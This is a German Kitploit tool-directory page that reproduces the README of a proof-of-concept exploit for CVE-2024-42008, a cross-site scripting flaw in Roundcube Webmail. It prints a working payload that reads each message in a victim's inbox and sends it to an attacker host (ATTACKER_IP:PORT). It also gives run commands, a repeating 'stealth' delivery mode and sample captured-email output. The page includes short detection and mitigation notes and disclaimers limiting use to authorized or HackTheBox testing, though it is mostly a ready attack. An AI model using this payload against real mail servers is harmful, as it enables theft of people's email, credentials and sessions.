Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Roundcube-CVE-2024-42008-POC — Proof-of-concept Exploit für CVE-2024-42008, eine Cross-Site Scripting-Schwachstelle in RoundCube Webmail. Liefert XSS-Payloads über Kontaktformulare, um E-Mails, Anmeldedaten und Sitzungstoken in autorisierten Penetrationstestumgebungen zu stehlen. | Kitploit
Tools/GitHubGitHub/rpgsec/roundcube-cve-2024-42008-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPhishingCTFLernen & Bildung
GitHubrpgsec/roundcube-cve-2024-42008-poc

Roundcube-CVE-2024-42008-POC

Proof-of-concept Exploit für CVE-2024-42008, eine Cross-Site Scripting-Schwachstelle in RoundCube Webmail. Liefert XSS-Payloads über Kontaktformulare, um E-Mails, Anmeldedaten und Sitzungstoken in autorisierten Penetrationstestumgebungen zu stehlen.

Repository anzeigen
19vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-42008 RoundCube XSS-Exploit

Übersicht

Dieses Repository enthält einen Proof-of-Concept-Exploit für CVE-2024-42008, eine Cross-Site-Scripting (XSS)-Schwachstelle in der RoundCube-Webmail-Anwendung. Dieser Exploit ist für Bildungszwecke und kontrollierte Penetrationstest-Umgebungen wie HackTheBox konzipiert.

Details zur Schwachstelle

CVE-2024-42008 Zusammenfassung

  • CVE ID: CVE-2024-42008
  • Typ: Cross-Site Scripting (XSS)
  • CVSS-Score: Hoch
  • Betroffene Versionen:
    • RoundCube ≤ 1.5.7
    • RoundCube 1.6.x ≤ 1.6.7
  • Behobene Versionen: 1.5.8, 1.6.8+

Technische Details

Die Schwachstelle existiert in der Funktion rcmail_action_mail_get->run() und erlaubt es entfernten Angreifern, beliebiges JavaScript im Browser des Opfers auszuführen. Der Fehler liegt in einer unzureichenden Eingabevalidierung bei der Verarbeitung von E-Mail-Inhalten, insbesondere bei der Handhabung von CSS-Animationen und JavaScript-Ausführungskontexten.

Hauptangriffsvektor:

  • Bösartiger HTML-Inhalt, der über Kontaktformulare oder E-Mail-Nachrichten injiziert wird
  • CSS-Animationseigenschaften werden verwendet, um die JavaScript-Ausführung auszulösen
  • onanimationstart-Ereignishandler umgehen Inhaltsfilter
  • Das JavaScript-Payload wird im Kontext der Webmail-Anwendung ausgeführt

Auswirkungen

Erfolgreiche Ausnutzung ermöglicht Angreifern:

  • E-Mails des Opfers aus dem Posteingang und anderen Ordnern stehlen
  • E-Mail-Metadaten exfiltrieren (UIDs, Nachrichtenlisten)
  • Auf E-Mail-Quellcode und Anhänge zugreifen
  • E-Mails vom Konto des Opfers senden
  • Anmeldeinformationen und Sitzungstoken sammeln
  • Aktionen im Namen des Opfers durchführen

Analyse des Exploit-Skripts

Skriptarchitektur

Der Exploit besteht aus drei Hauptkomponenten:

  1. XSS-Payload-Bereitstellung: Sendet bösartiges HTML über das Kontaktformular
  2. HTTP-Server: Hört auf exfiltrierte Daten
  3. Datenverarbeitung: Erfasst und protokolliert gestohlene E-Mails

Aufbau des Payloads

root@kitploit:~
// The core XSS payload uses CSS animations to trigger JavaScript
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=
  // 1. Fetch email list from victim's INBOX
  fetch('/?_task=mail&_action=list&_mbox=INBOX&_page=&_remote=1')
  .then(r=>r.text())
  .then(t=>{
    // 2. Extract email UIDs using regex
    [...t.matchAll(/this\\.add_message_row\\((\\d+),/g)].forEach(m=>{
      // 3. For each email, fetch full source
      fetch(`/?_task=mail&_uid=${m[1]}&_mbox=INBOX&_action=viewsource`)
      .then(r=>r.text())
      .then(data=>{
        // 4. Exfiltrate email data to attacker server
        fetch(`http://ATTACKER_IP:PORT/?data=${encodeURIComponent(data)}`)
      })
    })
  })
; foo=bar">

Hauptmerkmale

  • Kontinuierlicher Betrieb: Kann Payloads in regelmäßigen Abständen senden
  • Stealth-Modus: Minimale Fußabdrücke und Fehlerbehandlung
  • Datenprotokollierung: Automatisches Erfassen und Speichern exfiltrierter E-Mails
  • Debug-Modus: Proxy-Unterstützung für Verkehrsanalyse
  • Konfigurierbar: Mehrere Befehlszeilenoptionen

Verwendung

Voraussetzungen

root@kitploit:~
pip install requests

Grundlegende Verwendung

root@kitploit:~
# Single payload delivery
python cve-2024-42008-exploit.py

# Continuous mode (every 30 seconds)
python cve-2024-42008-exploit.py -c

# Custom interval (every 60 seconds)
python cve-2024-42008-exploit.py -c -i 60

# Debug mode with proxy
python cve-2024-42008-exploit.py -d

Konfiguration

Bearbeiten Sie das Skript, um Folgendes zu konfigurieren:

  • ATTACKER_IP: IP-Adresse Ihres Lauschservers
  • ATTACKER_PORT: Port zum Empfang exfiltrierter Daten
  • RECIPIENT_EMAIL: Ziel-E-Mail-Adresse
  • TARGET_URL: Angreifbare RoundCube-Instanz
  • PROXY: Proxyserver zum Debuggen (Burp Suite/Caido)

Befehlszeilenoptionen

OptionBeschreibung
-d, --debugAktiviert den Debug-Modus mit Proxy-Unterstützung
-c, --continuousSendet Payloads kontinuierlich
-i, --intervalIntervall zwischen Payloads (Standard: 30s)

Angriffsablauf

  1. Payload-Injektion: Skript sendet bösartiges HTML über das Kontaktformular
  2. E-Mail-Zustellung: Angreifbares RoundCube verarbeitet und liefert die E-Mail aus
  3. Opferinteraktion: Benutzer öffnet/sieht die bösartige E-Mail
  4. XSS-Ausführung: CSS-Animation löst JavaScript-Payload aus
  5. Datencxfiltration: JavaScript stiehlt E-Mails und sendet sie an den Angreifer
  6. Datenerfassung: Exploit-Server empfängt und protokolliert gestohlene Daten

Erkennung und Abhilfe

Für Verteidiger

Erkennungsindikatoren:

  • Ungewöhnliche CSS-Animationseigenschaften im E-Mail-Inhalt
  • onanimationstart-Ereignishandler in HTML
  • Verdächtiges JavaScript in E-Mail-Nachrichten
  • Ausgehende Anfragen an unbekannte Domänen von der Webmail
  • Wiederholte Kontaktformular-Einsendungen

Abhilfestrategien:

  • Aktualisieren Sie RoundCube auf Version 1.5.8 oder 1.6.8+
  • Implementieren Sie eine Content Security Policy (CSP)
  • Aktivieren Sie die E-Mail-Inhaltsfilterung
  • Überwachen Sie verdächtigen ausgehenden Datenverkehr
  • Regelmäßige Sicherheitsaudits der Webmail-Konfigurationen

Für Penetrationstester

Testüberlegungen:

  • Stellen Sie sicher, dass vor dem Testen eine ordnungsgemäße Autorisierung vorliegt
  • Dokumentieren Sie alle Aktivitäten für die Berichterstattung
  • Testen Sie nur in isolierten Umgebungen
  • Überprüfen Sie, ob das Ziel absichtlich verwundbar ist
  • Befolgen Sie verantwortungsvolle Offenlegungspraktiken

Rechtliche und ethische Überlegungen

⚠️ WARNUNG: Dieser Exploit wird nur zu Bildungs- und autorisierten Testzwecken bereitgestellt.

  • Verwenden Sie ihn nur auf Systemen, die Ihnen gehören oder für die Sie ausdrückliche Testberechtigung haben
  • Entwickelt für HackTheBox und ähnliche Lernplattformen
  • Unautorisierte Nutzung kann gegen lokale und internationale Gesetze verstoßen
  • Befolgen Sie stets verantwortungsvolle Offenlegungspraktiken
  • Respektieren Sie Datenschutz- und Datenschutzbestimmungen

Technische Referenzen

  • CVE-2024-42008 Offizieller Eintrag
  • RoundCube Security Advisory
  • CWE-79: Cross-site Scripting

Beispielausgabe

root@kitploit:~
[+] Listening on 10.10.14.209:8001 for exfiltrated data...
[2024-07-09 10:30:15] POST Request Sent! Status Code: 200

[+] 📩 Captured Email Data:
Return-Path: <[email protected]>
Received: from localhost (localhost [127.0.0.1])
...
[Email content]
--------------------------------------------------
[+] 🔥 Email data saved to emails.log

Haftungsausschluss

Dieser Code wird nur zu Bildungszwecken und für autorisierte Penetrationstests bereitgestellt. Die Autoren übernehmen keine Verantwortung für Missbrauch oder Schäden, die durch diese Software verursacht werden. Stellen Sie stets sicher, dass Sie vor dem Testen eines Systems über die entsprechende Autorisierung verfügen.

Tool herunterladen